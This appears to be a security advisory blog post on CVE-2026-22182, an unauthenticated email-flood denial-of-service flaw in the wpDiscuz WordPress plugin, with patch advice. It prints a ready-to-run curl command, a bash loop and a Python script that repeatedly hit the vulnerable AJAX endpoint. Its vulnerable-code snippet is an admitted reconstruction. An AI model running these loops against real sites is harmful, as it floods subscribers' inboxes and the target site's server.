If you’re using the wpDiscuz plugin for WordPress (version before 7.6.47), your website could be at risk of a denial of service (DoS) attack. Attackers can send repeated requests to a vulnerable AJAX endpoint, triggering the plugin’s mass notification system to send floods of emails to your site’s subscribers. This can overwhelm both your server and your subscribers’ inboxes.
This post breaks down the vulnerability (CVE-2026-22182) in plain language, shows sample exploitation, and provides links to further reading.
What Is wpDiscuz?
wpDiscuz is a popular WordPress plugin that enhances the native comment system, providing extra features like real-time comments, voting, and subscriber notifications.
Technical Details
The vulnerable code exposes an AJAX handler that lets anyone, without logging in, trigger notification emails. It does not check if a request is genuine—there is no nonce verification, no authentication, and no rate limiting.
The problem is in the way the plugin handles AJAX requests to
/wp-content/plugins/wpdiscuz/wpd-ajax.php
By sending specific parameters (postId, commentId, and a action parameter), the checkNotificationType() function gets called. This routine is supposed to notify subscribers of a new comment—but _anyone_ can call it as many times as they want, for any post, and force the system to send mass emails.
The Vulnerable Code (Simplified Example)
Here’s a simplified snippet based on public disclosures. Imagine the wpdiscuz-ajax.php contains logic similar to this:
// Vulnerable: NO Nonce or Auth check!
if ($_POST['action'] == 'wpc_check_notification_type') {
$postId = intval($_POST['postId']);
$commentId = intval($_POST['commentId']);
checkNotificationType($postId, $commentId);
// checkNotificationType triggers email notifications
....
}
No authentication (anyone can call)
- No CSRF/nonces (no check if request is valid)
No rate limiting (can call millions of times!)
---
Exploit Details: How Could an Attacker Abuse This?
An attacker just needs to send repeated POST requests to the AJAX endpoint, filling in arbitrary post and comment IDs. Each request triggers a batch of emails to all comment subscribers.
Example Exploit Request (using curl)
curl -X POST https://targetsite.com/wp-content/plugins/wpdiscuz/wpd-ajax.php \
-d "action=wpc_check_notification_type&postId=1&commentId=1"
Imagine running this in a loop
for i in {1..100}; do
curl -s -X POST https://targetsite.com/wp-content/plugins/wpdiscuz/wpd-ajax.php \
-d "action=wpc_check_notification_type&postId=1&commentId=1"
done
Result: Every POST triggers emails to all subscribers for the post. 100 requests could mean 100 rounds of mass emails. This can exhaust server resources, risk blacklisting your domain for spam, and annoy your users.
Demonstration Code (Python Example)
Below is an example script for educational purposes only. _Never attack live sites without permission!_
import requests
target = 'https://targetsite.com/wp-content/plugins/wpdiscuz/wpd-ajax.php'
data = {
'action': 'wpc_check_notification_type',
'postId': 1,
'commentId': 1
}
for i in range(100):
response = requests.post(target, data=data)
print(f'Request {i+1}, Status Code: {response.status_code}')
Subscriber Rage: Thousands of unwanted emails can turn loyal users into angry critics.
- Blacklisting: Your domain/IP may be blocked for sending spam.
Update wpDiscuz:
Upgrade to version 7.6.47 or later ASAP. The developers have patched the handler to check permissions and nonces.
- Official plugin page: https://wordpress.org/plugins/wpdiscuz/
CVE entry:
CVE-2026-22182 *(might be pending public details)*
wpDiscuz changelog:
https://wordpress.org/plugins/wpdiscuz/#developers
Vulnerability databases:
Final Thoughts
If you manage any WordPress sites with wpDiscuz installed, act quickly. Unauthenticated DoS-by-email is easy to exploit and can do real image and operational damage. Spread the word to anyone you know who runs WordPress forums or comment-heavy sites.
Stay safe out there and always keep your plugins updated.
*Content exclusive for technical audiences and security enthusiasts. For the latest, bookmark WordPress Security.*
Timeline
Published on: 03/13/2026 01:17:59 UTC